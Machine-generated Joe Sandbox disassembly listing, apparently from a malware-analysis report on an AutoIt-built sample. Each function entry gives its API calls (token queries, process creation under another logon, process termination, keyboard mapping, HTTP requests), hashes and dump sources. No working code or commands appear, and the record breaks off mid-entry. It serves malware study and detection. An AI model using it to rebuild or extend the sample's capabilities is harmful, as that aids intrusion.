                                                • Opcode Fuzzy Hash: babb3b1e52e9f9fbadb2a49e40adf40ba2f0107d3dc1901d6ee9bb725a3e62c6
                                                • Instruction Fuzzy Hash: 0131D272109345ABD724DF15C849B9BB7A9FF88314F00492AF58597191DB38E908CB96
                                                Function 007C8B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007C83D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C83E8
                                                  • Part of subcall function 007C83D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C83F2
                                                  • Part of subcall function 007C83D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8401
                                                  • Part of subcall function 007C83D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8408
                                                  • Part of subcall function 007C83D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C841E
                                                • GetLengthSid.ADVAPI32(?,00000000,007C8757), ref: 007C8B8C
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C8B98
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8B9F
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 007C8BB8
                                                • GetProcessHeap.KERNEL32(00000000,00000000,007C8757), ref: 007C8BCC
                                                • HeapFree.KERNEL32(00000000), ref: 007C8BD3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                • Opcode ID: 2d8b42322965ffd950e5338ef34a2c04e5ec17c276f1a3eb2fc004dec5122dd6
                                                • Instruction ID: f462dce50436b8b1a840e0cdbd709b21c8b49eaaf43b2aff17c85fa7c5561851
                                                • Opcode Fuzzy Hash: 2d8b42322965ffd950e5338ef34a2c04e5ec17c276f1a3eb2fc004dec5122dd6
                                                • Instruction Fuzzy Hash: 4E119AB2510209FBDB909FA4CC09FBFBBA8EF45315F14802DE84597250DB3AAE00CB65
                                                Function 007C88D9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C890A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 007C8911
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C8920
                                                • CloseHandle.KERNEL32(00000004), ref: 007C892B
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C895A
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 007C896E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: 38ddc9fb793634b71626174f67a79b1be7bcd3e92ef561ab06875f17e00008a3
                                                • Instruction ID: 72c5bdc9de49d8e18bb3d071206b923b56ff19093993351917240ba98218a123
                                                • Opcode Fuzzy Hash: 38ddc9fb793634b71626174f67a79b1be7bcd3e92ef561ab06875f17e00008a3
                                                • Instruction Fuzzy Hash: 2C115E72500209ABDF018FA4DD49FEE7BA9FF08304F044068FE04A2160CB799D60DB65
                                                Function 007CBA52 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007CBA77
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 007CBA88
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CBA8F
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007CBA97
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CBAAE
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 007CBAC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: c11482cb747148227cbe9ffeb25e7eef6bf838120d6db88f9074eae2387731dc
                                                • Instruction ID: db82684d3c24425829eb693c166a2f0bfc47fca4602474037fddf3951cd870a5
                                                • Opcode Fuzzy Hash: c11482cb747148227cbe9ffeb25e7eef6bf838120d6db88f9074eae2387731dc
                                                • Instruction Fuzzy Hash: 64012175A00218BBEF109BA59D49F5EBFA8EF48751F00806AFA04A7291DA749910CF95
                                                Function 007902E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00790313
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0079031B
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00790326
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00790331
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00790339
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00790341
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 559347b3c8c01c27a8a01c52f9bf9f34be1d590f801e3e1d5a7ef6573767074a
                                                • Instruction ID: 3cb68814c8bee7ed0c9ee629c0b128b21aecb5e5c7fdbba9adacf4260968adbe
                                                • Opcode Fuzzy Hash: 559347b3c8c01c27a8a01c52f9bf9f34be1d590f801e3e1d5a7ef6573767074a
                                                • Instruction Fuzzy Hash: 6E016CB0901759BDE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A864CBE5
                                                Function 007D5490 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D54A0
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D54B6
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007D54C5
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D54D4
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D54DE
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D54E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: e03b91ba63b8affe3742baff92bff3e2336d2967f9d7b85ef1e10162de9ca2e2
                                                • Instruction ID: 34ed82421a666810f0f155a4250769c68784b27e0792a74fef1a04e42b77b47d
                                                • Opcode Fuzzy Hash: e03b91ba63b8affe3742baff92bff3e2336d2967f9d7b85ef1e10162de9ca2e2
                                                • Instruction Fuzzy Hash: 66F01D32241158BBE7215BA29C0DEFB7B7CEFCAB11F004169FA04D11909EA95A01C6B9
                                                Function 007D72D9 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 007D72EC
                                                • EnterCriticalSection.KERNEL32(?,?,00781044,?,?), ref: 007D72FD
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00781044,?,?), ref: 007D730A
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00781044,?,?), ref: 007D7317
                                                  • Part of subcall function 007D6CDE: CloseHandle.KERNEL32(00000000,?,007D7324,?,00781044,?,?), ref: 007D6CE8
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D732A
                                                • LeaveCriticalSection.KERNEL32(?,?,00781044,?,?), ref: 007D7331
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 360819c2a2686113f96c5dfd83a356be03ad1341ebeb1b8499e4bb2d76c5367d
                                                • Instruction ID: 9002012c669ef1bae064f522cfb245444570e7085dea4f3deb264d26de64d584
                                                • Opcode Fuzzy Hash: 360819c2a2686113f96c5dfd83a356be03ad1341ebeb1b8499e4bb2d76c5367d
                                                • Instruction Fuzzy Hash: 70F08237140612EBE7111B64ED8C9EF773AFF49302B004532F602911A0DF7D5811CBA4
                                                Function 007C8C54 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C8C5F
                                                • UnloadUserProfile.USERENV(?,?), ref: 007C8C6B
                                                • CloseHandle.KERNEL32(?), ref: 007C8C74
                                                • CloseHandle.KERNEL32(?), ref: 007C8C7C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 007C8C85
                                                • HeapFree.KERNEL32(00000000), ref: 007C8C8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: df428b0ec7bbde894decd8bf4c80888691f5dd29303daf87bdacd909d3858fe4
                                                • Instruction ID: f0cff4565bbef61f72a5d1e9b0f846c356b8203bc9a8ef5770bab2d3ee3bd095
                                                • Opcode Fuzzy Hash: df428b0ec7bbde894decd8bf4c80888691f5dd29303daf87bdacd909d3858fe4
                                                • Instruction Fuzzy Hash: 44E05277104506FBDA012FE6EC0C96ABF69FF89762B548631F21981470CF3A9861DB68
                                                Function 007E8702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E8728
                                                • CharUpperBuffW.USER32(?,?), ref: 007E8837
                                                • VariantClear.OLEAUT32(?), ref: 007E89AF
                                                  • Part of subcall function 007D760B: VariantInit.OLEAUT32(00000000), ref: 007D764B
                                                  • Part of subcall function 007D760B: VariantCopy.OLEAUT32(00000000,?), ref: 007D7654
                                                  • Part of subcall function 007D760B: VariantClear.OLEAUT32(00000000), ref: 007D7660
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: 184bce5c86fb132f93d252aa29e81771bb2dca9be378390472a025962e97ff25
                                                • Instruction ID: 11ebe9dda711efa5cb008f4f1137e8443128e05de6d29e34c4f594dd483cf914
                                                • Opcode Fuzzy Hash: 184bce5c86fb132f93d252aa29e81771bb2dca9be378390472a025962e97ff25
                                                • Instruction Fuzzy Hash: BA91CC35608341DFCB00DF25C48496ABBF4EF89354F14896EF99A8B362DB38E905CB52
                                                Function 007D2D8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0078FE06: _wcscpy.LIBCMT ref: 0078FE29
                                                • _memset.LIBCMT ref: 007D2E7F
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D2EAE
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D2F61
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D2F8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: 00ef143a557b1fede358613f40a10c3a2e78cb7b00b1c029f89074743beced33
                                                • Instruction ID: 3a13b82742f50e7b2889ff2d2f96ed9fd126b88697f12994f5aaf59446849c64
                                                • Opcode Fuzzy Hash: 00ef143a557b1fede358613f40a10c3a2e78cb7b00b1c029f89074743beced33
                                                • Instruction Fuzzy Hash: 3751B1716083019ED7259F28D84866BBBF4EFA5310F144A2EF894D32A2DB68C9078792
                                                Function 007CD87B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007CD8E3
                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007CD919
                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007CD92A
                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007CD9AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                • String ID: DllGetClassObject
                                                • API String ID: 753597075-1075368562
                                                • Opcode ID: b15d854941070ff317117f168a5be85707c37f0e257d8b0bd4c08fbddd76ed3b
                                                • Instruction ID: 9110a67d5247b7a4bc4825cd00871df8697073c658bbd81ddf8849fd0319d32f
                                                • Opcode Fuzzy Hash: b15d854941070ff317117f168a5be85707c37f0e257d8b0bd4c08fbddd76ed3b
                                                • Instruction Fuzzy Hash: 3F418D75600204EFDB24CF55C884FAA7BA9EF4A314B1180BDED099F245D7B9ED44CBA0
                                                Function 007D2A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007D2AB8
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D2AD4
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 007D2B1A
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00835890,00000000), ref: 007D2B63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 1d320fd3648b7e7bdd6f34e9fcce9926f0d4cf29fac8581e0d91118aa1e5519a
                                                • Instruction ID: 5aaf6e0ea2fdacc2287459e197294764496bae020fe8400fd264148d8c276120
                                                • Opcode Fuzzy Hash: 1d320fd3648b7e7bdd6f34e9fcce9926f0d4cf29fac8581e0d91118aa1e5519a
                                                • Instruction Fuzzy Hash: D34180702043019FD720DF24C885B2ABBA9AF95320F10455FF96597392DBB8E907CB62
                                                Function 007ED8B9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007ED8D9
                                                  • Part of subcall function 007779AB: _memmove.LIBCMT ref: 007779F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharLower_memmove
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 3425801089-567219261
                                                • Opcode ID: 0d02049e050447065a5acfe97afa0f341fcb3f7e0f93af7eadc71e730421831c
                                                • Instruction ID: 70f46d1462ed048fbb99077d7dbb91975f9bc9a502f6a1d05e023d515cf9a124
                                                • Opcode Fuzzy Hash: 0d02049e050447065a5acfe97afa0f341fcb3f7e0f93af7eadc71e730421831c
                                                • Instruction Fuzzy Hash: BE31D070900619EFCF14EF55CC949EEB3B4FF09320B10862AE8659B2D2CB79AD05CB90
                                                Function 007C9152 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C91D6
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C91E9
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 007C9219
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                • Opcode ID: b448daf6c32d89eeeee3cb7dee407080f34da9e3ebe9e708ac61d0bf8f64a49a
                                                • Instruction ID: d3ecfa6988bf46e6f4a0beb30262c6cada2890e37d7eddb356e33c837454378d
                                                • Opcode Fuzzy Hash: b448daf6c32d89eeeee3cb7dee407080f34da9e3ebe9e708ac61d0bf8f64a49a
                                                • Instruction Fuzzy Hash: 0D21D071A00108BFDB18AB64DC8EDFEBB69EF45360B14822DF965972E0DB3D4D0AD610
                                                Function 007E1943 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1962
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1988
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007E19B8
                                                • InternetCloseHandle.WININET(00000000), ref: 007E19FF
                                                  • Part of subcall function 007E2599: GetLastError.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25AE
                                                  • Part of subcall function 007E2599: SetEvent.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: 046becd660ba120bfdd191a233fd3bf86796912fdfa1ced838a7b3ddbcb33df6
                                                • Instruction ID: 9af25a53ca111a149ced476732989f3967ed838ee6bce17b350f925fa3e9567b
                                                • Opcode Fuzzy Hash: 046becd660ba120bfdd191a233fd3bf86796912fdfa1ced838a7b3ddbcb33df6
                                                • Instruction Fuzzy Hash: E621D0B1101288BFEB219F61DC96EBF77ECEB4C744F50812AF405D2241EA38AE059771
                                                Function 007F6419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00771D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
                                                  • Part of subcall function 00771D35: GetStockObject.GDI32(00000011), ref: 00771D87
                                                  • Part of subcall function 00771D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6493
                                                • LoadLibraryW.KERNEL32(?), ref: 007F649A
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F64AF
                                                • DestroyWindow.USER32(?), ref: 007F64B7
                                                Strings
